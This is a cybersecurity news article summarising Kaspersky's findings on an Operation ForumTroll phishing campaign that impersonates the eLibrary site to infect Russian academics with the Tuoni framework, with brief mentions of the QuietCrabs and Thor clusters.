Kaspersky has attributed a new wave of phishing activity to a threat actor associated with Operation ForumTroll, marking a renewed focus on individual targets within Russia. The Russian cybersecurity firm said it identified the activity in October 2025, noting a shift in tactics from earlier campaigns that primarily targeted organizations. While the origins of the threat actor remain unknown, researchers observed a clear change in victim selection and social engineering methods compared to previous operations linked to the same cluster.
According to Kaspersky security researcher Georgy Kucherin, the latest campaign concentrates on scholars working in political science, international relations, and global economics at major Russian universities and research institutions. Earlier activity observed during the spring of the year focused on institutional targets, but the fall campaign narrowed its scope to specific individuals. Operation ForumTroll is known for conducting sophisticated phishing attacks that previously exploited a then zero day vulnerability in Google Chrome identified as CVE 2025 2783. That earlier activity enabled the delivery of the LeetAgent backdoor along with a spyware implant called Dante. In the current campaign, the initial infection vector again relies on carefully crafted emails designed to appear legitimate and relevant to the professional interests of the recipients.
The phishing emails claim to originate from eLibrary, a well known Russian scientific electronic library, and are sent from the address support@e library wiki. The domain used in the campaign was registered in March 2025, roughly six months before the phishing activity began, indicating that preparations were made well in advance. Kaspersky noted that this aging of the domain was likely intended to bypass common security checks that flag newly registered domains as suspicious. To reinforce credibility, the attackers hosted a replica of the legitimate eLibrary homepage on the fake domain, visually matching the real site available at elibrary. The emails instruct recipients to click an embedded link to download a plagiarism report. Once clicked, the link triggers the download of a ZIP archive named using the target’s last name, first name, and patronymic. These links are configured for single use only. Any repeated access attempt results in an error message in Russian stating that the download failed and should be retried later. If accessed from a non Windows platform, users are prompted to try again on a Windows computer.
Inside the downloaded archive is a Windows shortcut file bearing the same personalized name. When opened, it launches a PowerShell script that retrieves and executes a PowerShell based payload from a remote server. This payload then connects to another remote address to fetch a final stage dynamic link library and establishes persistence through COM hijacking. To reduce suspicion, a decoy PDF document is also downloaded and displayed to the victim. The final malicious component is Tuoni, a command and control framework commonly used in red team style operations, which provides the attackers with remote access to the compromised system. Kaspersky said ForumTroll has targeted organizations and individuals in Russia and Belarus since at least 2022 and is likely to continue operations in these regions. Separately, Positive Technologies reported on two additional threat clusters named QuietCrabs and Thor.
QuietCrabs, suspected to be linked to Chinese actors, exploits vulnerabilities in products including Microsoft SharePoint and Ivanti solutions to deploy web shells and malware loaders. Thor, first observed in 2025 attacks against Russian companies, uses ransomware families such as LockBit and Babuk alongside remote management tools to maintain long term access.
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.
